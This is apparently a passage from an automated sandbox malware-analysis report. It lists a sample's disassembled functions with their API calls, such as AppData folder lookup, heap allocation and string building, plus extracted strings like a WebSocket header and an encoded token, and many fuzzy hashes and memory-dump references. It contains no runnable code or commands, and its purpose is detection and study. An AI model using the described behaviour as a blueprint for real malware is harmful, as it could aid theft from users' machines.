                                  • Instruction ID: ffdc747e248f85a2cf4fc421b917ce8b1211a145cb5f448911ed793d7b6ca273
                                  • Opcode Fuzzy Hash: 67aeab9576de84dd42f75c5724e2e4cf1c290e2c3ab045c8c4890d8ed3265e50
                                  • Instruction Fuzzy Hash: 15118276A40215AFD710CF94EC49FBBB7BCE748720F004119FA09E3280DB7459049BA1
                                  Function 003690DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 0087c19cbd087ed45626298f333d41610d2d9ca3e68bda9f3a8fdc5460afe8e1
                                  • Instruction ID: 0c2f9bd1f1b3244355e129b0c6abef8b8df57ee550ace1fc9a25c865ed64a630
                                  • Opcode Fuzzy Hash: 0087c19cbd087ed45626298f333d41610d2d9ca3e68bda9f3a8fdc5460afe8e1
                                  • Instruction Fuzzy Hash: A841097050475CAEDB338B24CC95FFB7BFC9B46704F1488E9E98A8618AD2719A45CF60
                                  Function 00348980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1D5
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003489CD
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: b555d59943a0f9ce47cfe4db8ed38d9d04cd5f2b13d9bd3138549a7841f543c2
                                  • Instruction ID: 3d00db3a0a9070fb41ba2e572a2083f3185d3ba9b6f851f3f555b5d5f5e0eb81
                                  • Opcode Fuzzy Hash: b555d59943a0f9ce47cfe4db8ed38d9d04cd5f2b13d9bd3138549a7841f543c2
                                  • Instruction Fuzzy Hash: 2C219172300A509BC7229B5CE840A6EF7E9DBA1765B15092BF152CF681CBB1EC41C7A6
                                  Function 00348850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348883
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 6ad8d2ae7ee6efa670458fd6f905fed5175381a093dd5fbc7d0a6aee936d8c65
                                  • Instruction ID: b473779a657ffaad3a6347ef9e428e0b5f28565a8a76beb945168ce6bfd9ccb0
                                  • Opcode Fuzzy Hash: 6ad8d2ae7ee6efa670458fd6f905fed5175381a093dd5fbc7d0a6aee936d8c65
                                  • Instruction Fuzzy Hash: 923195B5E005199FCB09DF58C8916AEBBB6EB88350F14C269E915AF385DB30AD01CBD1
                                  Function 00365910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365922
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 70aec00c29200863f005d7c94a1f8c391e1d017fb82cfbc725f02537cb519969
                                  • Instruction ID: aa62ef9cb2f6df73f130f7f87a8999ebd79a0c06a2a77b840cc6ef3a8247b649
                                  • Opcode Fuzzy Hash: 70aec00c29200863f005d7c94a1f8c391e1d017fb82cfbc725f02537cb519969
                                  • Instruction Fuzzy Hash: CB115231318B40CBC7338F2CE840719B7E5ABD2761F258A6DE0D18B699D761E841C7A5
                                  Function 00363CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0036A430,000000FF), ref: 00363D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00363D27
                                  • wsprintfA.USER32 ref: 00363D37
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 7f4d8e61b3b9a3864257064237b5d579bee649f8f82049312044bc6f1c0d353a
                                  • Instruction ID: 27e133219fd5420690e148788c422d784b338eae78d5e0bdc8c267e31d6478de
                                  • Opcode Fuzzy Hash: 7f4d8e61b3b9a3864257064237b5d579bee649f8f82049312044bc6f1c0d353a
                                  • Instruction Fuzzy Hash: C201D271A90710BFE7205B55EC0EFAABB7CFB55B61F004115FA09972D0DBB41904EAB2
                                  Function 0036926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00369279
                                    • Part of subcall function 003687FF: __amsg_exit.LIBCMT ref: 0036880F
                                  • __amsg_exit.LIBCMT ref: 00369299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: Xu7$Xu7
                                  • API String ID: 441000147-1655893911
                                  • Opcode ID: 4fe479e2b0c3ca013fc6c04d701918457343f48fa360eebb1a535657e53edc8e
                                  • Instruction ID: 59f5d146af4cca88351f35446771feb5698a0d14b3aadf771aa82eaeffe5da8c
                                  • Opcode Fuzzy Hash: 4fe479e2b0c3ca013fc6c04d701918457343f48fa360eebb1a535657e53edc8e
                                  • Instruction Fuzzy Hash: EE01F932D06715A7D723AB29840679EB35CBF01714F56C416E8086B69CCB746C80DBD5
                                  Function 00348710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348737
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 913ff11d56595afb88fcc6e67ebbde62f3f3d37d2f1310ab954ef9df30f4d0fb
                                  • Instruction ID: 219f9f086a8e57b0a82b510983403a8be9c5d1c72f9de1a6aa8d4d934bd0e84e
                                  • Opcode Fuzzy Hash: 913ff11d56595afb88fcc6e67ebbde62f3f3d37d2f1310ab954ef9df30f4d0fb
                                  • Instruction Fuzzy Hash: DAF0B437F000210F83566A3D8D8449EBD8756E53A033AD725E91AEF369DC70FC8295D4
                                  Function 003686D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0036781C: __mtinitlocknum.LIBCMT ref: 00367832
                                    • Part of subcall function 0036781C: __amsg_exit.LIBCMT ref: 0036783E
                                  • ___addlocaleref.LIBCMT ref: 00368756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu7$xt7
                                  • API String ID: 3105635775-368805316
                                  • Opcode ID: 769e9e588a3647d088a092efff7968f98a41ea303fe3c91052f52ff787806efc
                                  • Instruction ID: 2b98c84c4d91aeceef46f603c3d63d492db1ea60d976f6750495830c6319b8f0
                                  • Opcode Fuzzy Hash: 769e9e588a3647d088a092efff7968f98a41ea303fe3c91052f52ff787806efc
                                  • Instruction Fuzzy Hash: 9A019671445700DAE722AF79C80674AFBE0AF51328F20CA1DE4DA5B2E5CFB4AA44CB55
                                  Function 0035E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035E544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E573
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E581
                                  • lstrcat.KERNEL32(?,00FAD4D0), ref: 0035E59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 78f379d80566a09f300632d035a7a246aef208de458dc593f7d0ebf96b7346f8
                                  • Instruction ID: b10739b1a0b800f39f3a9cf2857500600c6c6728f1225dc225709fbec0bff071
                                  • Opcode Fuzzy Hash: 78f379d80566a09f300632d035a7a246aef208de458dc593f7d0ebf96b7346f8
                                  • Instruction Fuzzy Hash: 3251B375A50108ABC756EB54EC46EFE37B8EB58300F444499F9099F251EE30AF889BA1
                                  Function 00361FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00361FDF, 00361FF5, 003620B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
